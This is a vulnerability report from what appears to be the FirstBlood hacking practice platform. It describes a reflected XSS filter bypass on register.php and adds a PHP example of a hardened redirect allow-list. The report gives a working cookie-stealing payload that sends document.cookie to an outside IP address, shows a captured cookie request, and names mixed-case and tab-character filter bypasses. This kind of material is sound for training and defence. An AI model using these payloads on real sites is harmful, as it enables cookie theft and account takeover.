FirstBlood-#759 Reflected XSS on register.php leads to account takeover
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-28, vigilante Level 4 reported:

Summary:

There is a reflected XSS on /register.php page that was vulnerable in V1 and can easily be reproduced in V2. The script executes when a user clicks on the "Return to previous page" button.

V2 of First Blood substitutes the words "javascript" with "nope". This can be bypassed by using "jaVaScript".

This vulnerability can be used for account takeover by stealing a user's cookies if the user is logged in.

Steps to Reproduce:

  1. Visit /register.php?ref=jaVaScript:alert(document.domain) and click on "Return to previous page".
  2. The XSS will fire and you'll see an alert box with the document domain.
  3. We can then steal cookies. I am running a Python HTTP server on a VPS box that captures the header and URL.
  4. Use this payload to steal cookies and send them to my server, then navigate to the URL again and click on "Return to previous page".

https://d8a1eeb46146-vigilante.a.firstbloodhackers.com/register.php?ref=jaVaScript:window.location.href=`http://165.227.134.100/${document.cookie}`

  5. Captured request: 85.160.6.99 - - [28/Oct/2021 06:45:32] "GET /drps=1d6b68c2ab7581821c793d361 HTTP/1.1" 404 -

Impact

We are able to execute JavaScript on behalf of a victim, which leads to stealing cookies and account takeover.

P3 Medium

Endpoint: /register.php

Parameter: ?ref=

Payload: jaVaScript:window.location.href=`http://165.227.134.100/${document.cookie}`


FirstBlood ID: 32
Vulnerability Type: Reflective XSS

The ?ref parameter on register.php was poorly fixed and the fix can be bypassed in several ways. First, the developer failed to use strtolower() before comparing strings, so a mixed-case scheme such as jaVaScript slips past the comparison; second, inserting characters such as %09 (a tab) into the scheme also bypasses the filter, because the browser drops such characters when it parses the URL.
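As an added example (not FirstBlood's own code), the V2-style substitution described above beside a hardened replacement that allow-lists where the "Return to previous page" link may point; the host name, function names and sample inputs are constructed for illustration.

```php
<?php
// Weak V2-style filter: a single exact-case substring replacement, as the report describes.
function weak_filter(string $ref): string
{
    return str_replace('javascript', 'nope', $ref);
}

// Hardened: return $ref only if it is a same-site path or an http(s) URL on $allowedHost;
// anything else (other schemes, control characters, protocol-relative URLs) gets a fixed fallback.
function safe_return_url(string $ref, string $allowedHost, string $fallback = '/'): string
{
    // Reject ASCII control characters: browsers drop tab/newline while parsing
    // a URL, so "java\tscript:" still means "javascript:" (the %09 bypass).
    if ($ref === '' || preg_match('/[\x00-\x1F\x7F]/', $ref) !== 0) {
        return $fallback;
    }
    // Same-site relative path: exactly one leading "/" ("//host" and "/\host"
    // are network-path references to another origin).
    if ($ref[0] === '/') {
        return (strlen($ref) > 1 && ($ref[1] === '/' || $ref[1] === '\\')) ? $fallback : $ref;
    }
    $parts = parse_url($ref);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return $fallback; // "jaVaScript:alert(1)" parses with a scheme but no host
    }
    // Normalise case before comparing: the step the V2 fix skipped.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return $fallback;
    }
    if (strtolower($parts['host']) !== strtolower($allowedHost)) {
        return $fallback;
    }
    return $ref;
}

// Constructed inputs against a hypothetical host: the report's bypasses plus two legitimate values.
$allowedHost = 'firstblood.example';
$inputs = [
    '/login.php',
    'https://firstblood.example/login.php',
    'jaVaScript:alert(document.domain)',
    "java\tscript:alert(document.domain)", // what ?ref=java%09script:... decodes to
    '//evil.example/',
];
foreach ($inputs as $ref) {
    printf("%-40s weak: %-40s safe: %s\n", addcslashes($ref, "\t"), weak_filter($ref), safe_return_url($ref, $allowedHost));
}
```

When the result is written into the link, it still needs HTML encoding for the attribute context (htmlspecialchars with ENT_QUOTES), since the allow-list only decides where the link may point, not how it is rendered.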